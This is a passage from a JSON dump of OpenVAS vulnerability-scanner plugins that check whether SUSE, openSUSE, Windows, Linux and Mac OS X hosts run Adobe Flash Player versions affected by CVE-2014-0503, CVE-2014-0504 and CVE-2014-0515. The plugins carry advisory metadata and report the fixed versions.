isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-07-19T22:14:28", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804514", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804514\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:57:50 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.272 and 11.8.x through 12.0.x\nbefore 12.0.0.77 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.272 or 12.0.0.77 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.272\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.76\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2017-12-12T11:10:26", "description": "Check for the Version of flash-player", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850576", "href": "http://plugins.openvas.org/nasl.php?oid=850576", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0379_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850576);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 13:34:20 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)\");\n\n tag_insight = \"\n Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\";\n\n tag_affected = \"flash-player on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0379_1\");\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-04-22T17:03:10", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804561", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804561\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 11:45:09 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.356 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.356 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.356\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.356\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0605-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850874", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850874\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:20:57 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0605-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This flash-player update to version 11.2.202.356 fixes the\n following critical security issue:\n\n * bnc#875577: buffer overflow vulnerability that leads\n to arbitrary code execution (CVE-2014-0515)\n\n Adobe Security Bulletin (APSB14-13)\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0605-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2014:0589-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850584", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850584\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:21:18 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2014:0589-1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n\n * bnc#875577, APSB14-13, CVE-2014-0515\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0589-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:13", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804560\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 12:04:33 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.279 and 11.8.x through 13.0.x\nbefore 13.0.0.206 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.279 or 13.0.0.206 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.279\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.205\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:21", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804559", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804559\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 11:45:09 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.279 and 11.8.x through 13.0.x\nbefore 13.0.0.206 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.279 or 13.0.0.206 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.279\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.205\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:10:22", "description": "Check for the Version of update", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "openvas", "title": "SuSE Update for update openSUSE-SU-2014:0589-1 (update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850584", "href": "http://plugins.openvas.org/nasl.php?oid=850584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0589_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for update openSUSE-SU-2014:0589-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850584);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n 